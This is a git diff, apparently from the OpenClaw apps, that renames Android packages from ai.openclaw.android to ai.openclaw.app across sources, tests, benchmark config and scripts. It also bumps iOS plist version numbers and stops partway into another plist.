b/apps/android/app/src/main/java/ai/openclaw/app/voice/TalkDirectiveParser.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/TalkDirectiveParser.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/TalkDirectiveParser.kt index 5c80cc1f4f1..cd3770cf8c8 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/TalkDirectiveParser.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/TalkDirectiveParser.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonElement diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/TalkModeManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/TalkModeManager.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/TalkModeManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/TalkModeManager.kt index 3b20b4f5429..b1fe774a80b 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/TalkModeManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/TalkModeManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import android.Manifest import android.content.Context @@ -21,9 +21,9 @@ import android.speech.tts.TextToSpeech import android.speech.tts.UtteranceProgressListener import android.util.Log import androidx.core.content.ContextCompat -import ai.openclaw.android.gateway.GatewaySession -import ai.openclaw.android.isCanonicalMainSessionKey -import ai.openclaw.android.normalizeMainKey +import ai.openclaw.app.gateway.GatewaySession +import ai.openclaw.app.isCanonicalMainSessionKey +import ai.openclaw.app.normalizeMainKey import java.io.File import java.net.HttpURLConnection import java.net.URL diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeCommandExtractor.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeCommandExtractor.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeCommandExtractor.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeCommandExtractor.kt index dccd3950c90..efa9be0547c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeCommandExtractor.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeCommandExtractor.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice object VoiceWakeCommandExtractor { fun extractCommand(text: String, triggerWords: List): String? { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeManager.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeManager.kt index 334f985a028..a6395429a82 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/VoiceWakeManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/VoiceWakeManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import android.content.Context import android.content.Intent diff --git a/apps/android/app/src/test/java/ai/openclaw/android/NodeForegroundServiceTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/NodeForegroundServiceTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/NodeForegroundServiceTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/NodeForegroundServiceTest.kt index 7a81936ecd2..fddc347f487 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/NodeForegroundServiceTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/NodeForegroundServiceTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.app.Notification import android.content.Intent diff --git a/apps/android/app/src/test/java/ai/openclaw/android/WakeWordsTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/WakeWordsTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/WakeWordsTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/WakeWordsTest.kt index 55730e2f5ab..2e255e1598d 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/WakeWordsTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/WakeWordsTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import org.junit.Assert.assertEquals import org.junit.Assert.assertNull diff --git a/apps/android/app/src/test/java/ai/openclaw/android/gateway/BonjourEscapesTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/gateway/BonjourEscapesTest.kt similarity index 93% rename from apps/android/app/src/test/java/ai/openclaw/android/gateway/BonjourEscapesTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/gateway/BonjourEscapesTest.kt index fe00e50a72d..f0db7f05b87 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/gateway/BonjourEscapesTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/gateway/BonjourEscapesTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import org.junit.Assert.assertEquals import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/gateway/DeviceAuthPayloadTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/gateway/DeviceAuthPayloadTest.kt similarity index 96% rename from apps/android/app/src/test/java/ai/openclaw/android/gateway/DeviceAuthPayloadTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/gateway/DeviceAuthPayloadTest.kt index 95e145fb11f..4f7e7eab978 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/gateway/DeviceAuthPayloadTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/gateway/DeviceAuthPayloadTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import org.junit.Assert.assertEquals import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTest.kt index 03930ee2a8b..a3f301498c8 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import kotlinx.coroutines.CompletableDeferred import kotlinx.coroutines.CoroutineScope diff --git a/apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTimeoutTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTimeoutTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTimeoutTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTimeoutTest.kt index cd08715c405..043d029d367 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/gateway/GatewaySessionInvokeTimeoutTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/gateway/GatewaySessionInvokeTimeoutTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import org.junit.Assert.assertEquals import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/gateway/InvokeErrorParserTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/gateway/InvokeErrorParserTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/gateway/InvokeErrorParserTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/gateway/InvokeErrorParserTest.kt index ca8e8f21424..f30cd27ed5c 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/gateway/InvokeErrorParserTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/gateway/InvokeErrorParserTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import org.junit.Assert.assertEquals import org.junit.Assert.assertFalse diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/AppUpdateHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/AppUpdateHandlerTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/node/AppUpdateHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/AppUpdateHandlerTest.kt index 743ed92c6d5..6c1ed9fb8b3 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/AppUpdateHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/AppUpdateHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import java.io.File import org.junit.Assert.assertEquals diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/CalendarHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/CalendarHandlerTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/node/CalendarHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/CalendarHandlerTest.kt index ca236da7d46..61d9859b36c 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/CalendarHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/CalendarHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import kotlinx.serialization.json.Json diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/CameraHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/CameraHandlerTest.kt similarity index 95% rename from apps/android/app/src/test/java/ai/openclaw/android/node/CameraHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/CameraHandlerTest.kt index 470f925a7d4..5a60562b421 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/CameraHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/CameraHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import org.junit.Assert.assertEquals import org.junit.Assert.assertFalse diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/CanvasControllerSnapshotParamsTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/CanvasControllerSnapshotParamsTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/node/CanvasControllerSnapshotParamsTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/CanvasControllerSnapshotParamsTest.kt index dd1b9d5d19a..f1e204482ce 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/CanvasControllerSnapshotParamsTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/CanvasControllerSnapshotParamsTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import org.junit.Assert.assertEquals import org.junit.Assert.assertNull diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/ConnectionManagerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/ConnectionManagerTest.kt similarity index 95% rename from apps/android/app/src/test/java/ai/openclaw/android/node/ConnectionManagerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/ConnectionManagerTest.kt index 534b90a2121..62753f6b391 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/ConnectionManagerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/ConnectionManagerTest.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.GatewayEndpoint +import ai.openclaw.app.gateway.GatewayEndpoint import org.junit.Assert.assertEquals import org.junit.Assert.assertNull import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/ContactsHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/ContactsHandlerTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/node/ContactsHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/ContactsHandlerTest.kt index 39242dc9f82..09becee4b7f 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/ContactsHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/ContactsHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import kotlinx.serialization.json.Json diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/DeviceHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/DeviceHandlerTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/node/DeviceHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/DeviceHandlerTest.kt index 6232b0c9e11..5574baf6e14 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/DeviceHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/DeviceHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import kotlinx.serialization.json.Json diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/InvokeCommandRegistryTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/InvokeCommandRegistryTest.kt similarity index 87% rename from apps/android/app/src/test/java/ai/openclaw/android/node/InvokeCommandRegistryTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/InvokeCommandRegistryTest.kt index 0b8548ab215..58c89f1cd52 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/InvokeCommandRegistryTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/InvokeCommandRegistryTest.kt @@ -1,16 +1,16 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.protocol.OpenClawCalendarCommand -import ai.openclaw.android.protocol.OpenClawCameraCommand -import ai.openclaw.android.protocol.OpenClawCapability -import ai.openclaw.android.protocol.OpenClawContactsCommand -import ai.openclaw.android.protocol.OpenClawDeviceCommand -import ai.openclaw.android.protocol.OpenClawLocationCommand -import ai.openclaw.android.protocol.OpenClawMotionCommand -import ai.openclaw.android.protocol.OpenClawNotificationsCommand -import ai.openclaw.android.protocol.OpenClawPhotosCommand -import ai.openclaw.android.protocol.OpenClawSmsCommand -import ai.openclaw.android.protocol.OpenClawSystemCommand +import ai.openclaw.app.protocol.OpenClawCalendarCommand +import ai.openclaw.app.protocol.OpenClawCameraCommand +import ai.openclaw.app.protocol.OpenClawCapability +import ai.openclaw.app.protocol.OpenClawContactsCommand +import ai.openclaw.app.protocol.OpenClawDeviceCommand +import ai.openclaw.app.protocol.OpenClawLocationCommand +import ai.openclaw.app.protocol.OpenClawMotionCommand +import ai.openclaw.app.protocol.OpenClawNotificationsCommand +import ai.openclaw.app.protocol.OpenClawPhotosCommand +import ai.openclaw.app.protocol.OpenClawSmsCommand +import ai.openclaw.app.protocol.OpenClawSystemCommand import org.junit.Assert.assertFalse import org.junit.Assert.assertTrue import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/JpegSizeLimiterTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/JpegSizeLimiterTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/node/JpegSizeLimiterTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/JpegSizeLimiterTest.kt index 5de1dd5451a..8ede18ed8d9 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/JpegSizeLimiterTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/JpegSizeLimiterTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import org.junit.Assert.assertEquals import org.junit.Assert.assertTrue diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/MotionHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/MotionHandlerTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/node/MotionHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/MotionHandlerTest.kt index c7eff170a0c..c6fad294871 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/MotionHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/MotionHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import kotlinx.coroutines.test.runTest diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/NodeHandlerRobolectricTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/NodeHandlerRobolectricTest.kt similarity index 90% rename from apps/android/app/src/test/java/ai/openclaw/android/node/NodeHandlerRobolectricTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/NodeHandlerRobolectricTest.kt index 8138c7039fd..d89a9b188bb 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/NodeHandlerRobolectricTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/NodeHandlerRobolectricTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import org.junit.runner.RunWith diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/NotificationsHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/NotificationsHandlerTest.kt similarity index 99% rename from apps/android/app/src/test/java/ai/openclaw/android/node/NotificationsHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/NotificationsHandlerTest.kt index 26869cad9ee..dc609bff47f 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/NotificationsHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/NotificationsHandlerTest.kt @@ -1,7 +1,7 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import kotlinx.coroutines.test.runTest import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonObject diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/PhotosHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/PhotosHandlerTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/node/PhotosHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/PhotosHandlerTest.kt index 707d886d74f..82318b3524c 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/PhotosHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/PhotosHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import kotlinx.serialization.json.Json diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/SmsManagerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/SmsManagerTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/node/SmsManagerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/SmsManagerTest.kt index a3d61329b4a..c1b98908f08 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/SmsManagerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/SmsManagerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import kotlinx.serialization.json.jsonObject import kotlinx.serialization.json.jsonPrimitive diff --git a/apps/android/app/src/test/java/ai/openclaw/android/node/SystemHandlerTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/node/SystemHandlerTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/node/SystemHandlerTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/node/SystemHandlerTest.kt index 770d1920c76..994864cf364 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/node/SystemHandlerTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/node/SystemHandlerTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import org.junit.Assert.assertEquals import org.junit.Assert.assertFalse diff --git a/apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIActionTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIActionTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIActionTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIActionTest.kt index c767d2eb910..7879534da0b 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIActionTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIActionTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.protocol +package ai.openclaw.app.protocol import kotlinx.serialization.json.Json import kotlinx.serialization.json.jsonObject diff --git a/apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawProtocolConstantsTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawProtocolConstantsTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawProtocolConstantsTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawProtocolConstantsTest.kt index cd1cf847101..25eda3872e3 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/protocol/OpenClawProtocolConstantsTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/protocol/OpenClawProtocolConstantsTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.protocol +package ai.openclaw.app.protocol import org.junit.Assert.assertEquals import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/ui/GatewayConfigResolverTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/ui/GatewayConfigResolverTest.kt similarity index 98% rename from apps/android/app/src/test/java/ai/openclaw/android/ui/GatewayConfigResolverTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/ui/GatewayConfigResolverTest.kt index 7dc2dd1a239..72738843ff0 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/ui/GatewayConfigResolverTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/ui/GatewayConfigResolverTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import java.util.Base64 import org.junit.Assert.assertEquals diff --git a/apps/android/app/src/test/java/ai/openclaw/android/ui/chat/SessionFiltersTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/ui/chat/SessionFiltersTest.kt similarity index 93% rename from apps/android/app/src/test/java/ai/openclaw/android/ui/chat/SessionFiltersTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/ui/chat/SessionFiltersTest.kt index 8e9e5800095..604e78cae3d 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/ui/chat/SessionFiltersTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/ui/chat/SessionFiltersTest.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat -import ai.openclaw.android.chat.ChatSessionEntry +import ai.openclaw.app.chat.ChatSessionEntry import org.junit.Assert.assertEquals import org.junit.Test diff --git a/apps/android/app/src/test/java/ai/openclaw/android/voice/TalkDirectiveParserTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/voice/TalkDirectiveParserTest.kt similarity index 97% rename from apps/android/app/src/test/java/ai/openclaw/android/voice/TalkDirectiveParserTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/voice/TalkDirectiveParserTest.kt index 77d62849c6c..b7a18947a13 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/voice/TalkDirectiveParserTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/voice/TalkDirectiveParserTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import org.junit.Assert.assertEquals import org.junit.Assert.assertNull diff --git a/apps/android/app/src/test/java/ai/openclaw/android/voice/TalkModeConfigParsingTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/voice/TalkModeConfigParsingTest.kt similarity index 82% rename from apps/android/app/src/test/java/ai/openclaw/android/voice/TalkModeConfigParsingTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/voice/TalkModeConfigParsingTest.kt index 5daa62080d7..9e224552ade 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/voice/TalkModeConfigParsingTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/voice/TalkModeConfigParsingTest.kt @@ -1,8 +1,10 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import kotlinx.serialization.json.Json +import kotlinx.serialization.json.buildJsonObject import kotlinx.serialization.json.jsonPrimitive import kotlinx.serialization.json.jsonObject +import kotlinx.serialization.json.put import org.junit.Assert.assertEquals import org.junit.Assert.assertNotNull import org.junit.Assert.assertTrue @@ -38,16 +40,12 @@ class TalkModeConfigParsingTest { @Test fun fallsBackToLegacyTalkFieldsWhenNormalizedPayloadMissing() { + val legacyApiKey = "legacy-key" // pragma: allowlist secret val talk = - json.parseToJsonElement( - """ - { - "voiceId": "voice-legacy", - "apiKey": "legacy-key" - } - """.trimIndent(), - ) - .jsonObject + buildJsonObject { + put("voiceId", "voice-legacy") + put("apiKey", legacyApiKey) // pragma: allowlist secret + } val selection = TalkModeManager.selectTalkProviderConfig(talk) assertNotNull(selection) diff --git a/apps/android/app/src/test/java/ai/openclaw/android/voice/VoiceWakeCommandExtractorTest.kt b/apps/android/app/src/test/java/ai/openclaw/app/voice/VoiceWakeCommandExtractorTest.kt similarity index 95% rename from apps/android/app/src/test/java/ai/openclaw/android/voice/VoiceWakeCommandExtractorTest.kt rename to apps/android/app/src/test/java/ai/openclaw/app/voice/VoiceWakeCommandExtractorTest.kt index 76b50d8abcd..2e2e5d87402 100644 --- a/apps/android/app/src/test/java/ai/openclaw/android/voice/VoiceWakeCommandExtractorTest.kt +++ b/apps/android/app/src/test/java/ai/openclaw/app/voice/VoiceWakeCommandExtractorTest.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import org.junit.Assert.assertEquals import org.junit.Assert.assertNull diff --git a/apps/android/benchmark/build.gradle.kts b/apps/android/benchmark/build.gradle.kts index 5e186e9d2c1..a59bfe3c5e2 100644 --- a/apps/android/benchmark/build.gradle.kts +++ b/apps/android/benchmark/build.gradle.kts @@ -4,7 +4,7 @@ plugins { } android { - namespace = "ai.openclaw.android.benchmark" + namespace = "ai.openclaw.app.benchmark" compileSdk = 36 defaultConfig { diff --git a/apps/android/benchmark/src/main/java/ai/openclaw/android/benchmark/StartupMacrobenchmark.kt b/apps/android/benchmark/src/main/java/ai/openclaw/app/benchmark/StartupMacrobenchmark.kt similarity index 96% rename from apps/android/benchmark/src/main/java/ai/openclaw/android/benchmark/StartupMacrobenchmark.kt rename to apps/android/benchmark/src/main/java/ai/openclaw/app/benchmark/StartupMacrobenchmark.kt index 46181f6a9a1..f3e56789dcf 100644 --- a/apps/android/benchmark/src/main/java/ai/openclaw/android/benchmark/StartupMacrobenchmark.kt +++ b/apps/android/benchmark/src/main/java/ai/openclaw/app/benchmark/StartupMacrobenchmark.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.benchmark +package ai.openclaw.app.benchmark import androidx.benchmark.macro.CompilationMode import androidx.benchmark.macro.FrameTimingMetric @@ -18,7 +18,7 @@ class StartupMacrobenchmark { @get:Rule val benchmarkRule = MacrobenchmarkRule() - private val packageName = "ai.openclaw.android" + private val packageName = "ai.openclaw.app" @Test fun coldStartup() { diff --git a/apps/android/scripts/perf-startup-benchmark.sh b/apps/android/scripts/perf-startup-benchmark.sh index 70342d3cba4..b85ec220220 100755 --- a/apps/android/scripts/perf-startup-benchmark.sh +++ b/apps/android/scripts/perf-startup-benchmark.sh @@ -4,7 +4,7 @@ set -euo pipefail SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)" ANDROID_DIR="$(cd -- "$SCRIPT_DIR/.." && pwd)" RESULTS_DIR="$ANDROID_DIR/benchmark/results" -CLASS_FILTER="ai.openclaw.android.benchmark.StartupMacrobenchmark#coldStartup" +CLASS_FILTER="ai.openclaw.app.benchmark.StartupMacrobenchmark#coldStartup" BASELINE_JSON="" usage() { diff --git a/apps/android/scripts/perf-startup-hotspots.sh b/apps/android/scripts/perf-startup-hotspots.sh index 787d5fac300..ab34b7913d4 100755 --- a/apps/android/scripts/perf-startup-hotspots.sh +++ b/apps/android/scripts/perf-startup-hotspots.sh @@ -4,7 +4,7 @@ set -euo pipefail SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)" ANDROID_DIR="$(cd -- "$SCRIPT_DIR/.." && pwd)" -PACKAGE="ai.openclaw.android" +PACKAGE="ai.openclaw.app" ACTIVITY=".MainActivity" DURATION_SECONDS="10" OUTPUT_PERF_DATA="" diff --git a/apps/ios/ActivityWidget/Info.plist b/apps/ios/ActivityWidget/Info.plist index 4e12dc4f884..c404f71dba2 100644 --- a/apps/ios/ActivityWidget/Info.plist +++ b/apps/ios/ActivityWidget/Info.plist @@ -17,9 +17,9 @@ CFBundlePackageType XPC! CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 20260301 + 20260307 NSExtension NSExtensionPointIdentifier diff --git a/apps/ios/ShareExtension/Info.plist b/apps/ios/ShareExtension/Info.plist index 6e1113cf205..dbf921457a7 100644 --- a/apps/ios/ShareExtension/Info.plist 